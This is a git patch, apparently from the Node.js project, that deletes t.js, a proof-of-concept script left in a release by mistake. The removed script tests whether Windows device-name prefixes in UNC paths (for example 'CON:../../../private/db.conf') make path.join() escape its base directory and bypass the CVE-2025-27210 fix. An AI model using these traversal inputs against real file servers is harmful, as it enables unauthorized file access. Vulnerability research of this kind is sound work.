From e7d071f0a11241f49e0663c16902bd87b2c1c2df Mon Sep 17 00:00:00 2001
From: RafaelGSS <rafael.nunu@hotmail.com>
Date: Tue, 13 Jan 2026 11:31:31 -0300
Subject: [PATCH] meta: remove t.js

It was added by mistake in the last release
---
 t.js | 39 ---------------------------------------
 1 file changed, 39 deletions(-)
 delete mode 100644 t.js

diff --git a/t.js b/t.js
deleted file mode 100644
index 8b293114dfd1a1..00000000000000
--- a/t.js
+++ /dev/null
@@ -1,39 +0,0 @@
-const path = require("path")
-
-console.log("Node.js UNC Path Device Name Bypass PoC");
-console.log("Version:", process.version);
-console.log("Date:", new Date().toISOString());
-console.log("");
-
-console.log("[1] CVE-2025-27210 Fixed for regular paths:");
-console.log("  path.normalize(\"CON:../../secret.txt\")");
-console.log("  Result:", path.normalize("CON:../../secret.txt"));
-console.log("  SAFE - Device name prefixed");
-console.log("");
-
-console.log("[2] UNC paths with path.join() - STILL VULNERABLE:");
-
-function testExploit(testName, base, input, expectedSafe) {
-  const result = path.join(base, input);
-  const baseDepth = base.split("\\\\").length;
-  const resultDepth = result.split("\\\\").length;
-  const escaped = result.indexOf(base.split("\\\\").pop()) === -1;
-
-  console.log(`\n[${testName}]`);
-  console.log("  Base Path:", base);
-  console.log("  Malicious Input:", input);
-  console.log("  Result Path:", result);
-  console.log("  Expected Safe:", expectedSafe);
-  console.log("  Actual Result:", result);
-  console.log("  BYPASSED:", escaped || !result.startsWith(base.substring(0,10)) ? "YES" : "NO");
-}
-
-testExploit("Test 1", "\\\\fileserver\\\\public\\\\uploads", "CON:../../../private/db.conf", "\\\\fileserver\\\\public\\\\uploads\\\\.\\\\CON:..\\\\..\\\\..\\\\private\\\\db.conf");
-testExploit("Test 2", "\\\\webapp\\\\data", "PRN:../../C$/admin", "\\\\webapp\\\\data\\\\.\\\\PRN:..\\\\..\\\\C$\\\\admin");
-testExploit("Test 3", "\\\\nas\\\\share", "AUX:../secret", "\\\\nas\\\\share\\\\.\\\\AUX:..\\\\secret");
-
-console.log("\n[!] All device names allow path traversal in UNC paths!");
-console.log("[!] This bypasses CVE-2025-27210 protection!");
-
-console.log('Path.join')
-console.log(path.join('/home/rafaelgss/', '../tmp'))